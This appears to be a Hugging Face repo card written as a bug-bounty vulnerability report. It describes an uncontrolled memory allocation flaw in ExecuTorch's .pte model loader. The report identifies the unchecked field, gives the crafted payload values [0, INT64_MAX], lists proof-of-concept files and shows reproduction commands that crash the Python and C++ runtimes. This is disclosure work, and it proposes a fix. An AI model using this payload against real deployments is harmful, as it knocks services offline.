YAML Metadata Warning:empty or missing yaml metadata in repo card
Check out the documentation for more information.
ExecuTorch CWE-789: Uncontrolled Memory Allocation in .pte Format
Status: FINDING CONFIRMED β READY TO SUBMIT
Severity: High (P2) β DoS | CVSS 7.5
Target
- Repo: pytorch/executorch
- Platform: huntr.com
- Format:
.pte(FlatBuffers-based PyTorch Edge inference format)
Vulnerable Files
| File | Function | Issue |
|---|---|---|
runtime/executor/method_meta.cpp |
MethodMeta::memory_planned_buffer_size() |
Reads non_const_buffer_sizes[index+1] from FlatBuffer; only checks >= 0, no upper-bound cap |
extension/pybindings/pybindings.cpp |
PyProgram constructor |
std::vector<uint8_t>(buffer_size) with uncapped attacker value β std::bad_alloc |
examples/portable/executor_runner/executor_runner.cpp |
buffer allocation loop | std::make_unique<uint8_t[]>(buffer_size) with uncapped attacker value β OOM crash |
Missing Check
// Present in memory_planned_buffer_size():
ET_CHECK_OR_RETURN_ERROR(size >= 0, InvalidProgram, ...); // rejects negatives
// MISSING:
constexpr int64_t kMaxPlannedBufferSize = 32LL * 1024 * 1024 * 1024;
ET_CHECK_OR_RETURN_ERROR(size <= kMaxPlannedBufferSize, InvalidProgram, ...);
FlatBuffer Field
table ExecutionPlan {
...
non_const_buffer_sizes: [int64]; // field index 8 β attacker-controlled
}
Index note: Index 0 of the vector is reserved internally.memory_planned_buffer_size(j) reads non_const_buffer_sizes[j + 1].
Malicious payload uses 2 elements: [0, INT64_MAX].
Attack
Attacker crafts a .pte with:
Program.execution_plan[0].non_const_buffer_sizes = [0, 9223372036854775807]
Victim loads the file β runtime reads INT64_MAX β allocates INT64_MAX bytes β crash.
PoC Files
| File | Purpose |
|---|---|
poc_executorch_oom.py |
Builds malicious.pte and triggers OOM |
malicious.pte |
104-byte crafted FlatBuffer (generated by script) |
poc-evidence.html |
Evidence page with real run output |
report_final.md |
Submission-ready huntr report |
Reproduction
# Dependency
pip install flatbuffers --break-system-packages
# Build malicious.pte and trigger allocation
python3 poc_executorch_oom.py
Expected output (allocation simulation):
[*] Saved malicious.pte (104 bytes)
[*] File identifier at offset 4: b'ET12'
[+] MemoryError β confirmed OOM (equivalent to std::bad_alloc in C++ runtime)
Binary verification:
File size : 104 bytes
File ident : b'ET12'
INT64_MAX pos : byte 80 value=ffffffffffffff7f
Full Runtime Crash (requires executorch installed)
# Option A β Python runtime
pip install executorch
python3 poc_executorch_oom.py
# β MemoryError / SystemError (std::bad_alloc wrapped)
# Option B β C++ executor_runner
./executor_runner --model_path malicious.pte
# β terminate called after throwing an instance of 'std::bad_alloc'
- Downloads last month
- 2
Inference Providers NEW
This model isn't deployed by any Inference Provider. π Ask for provider support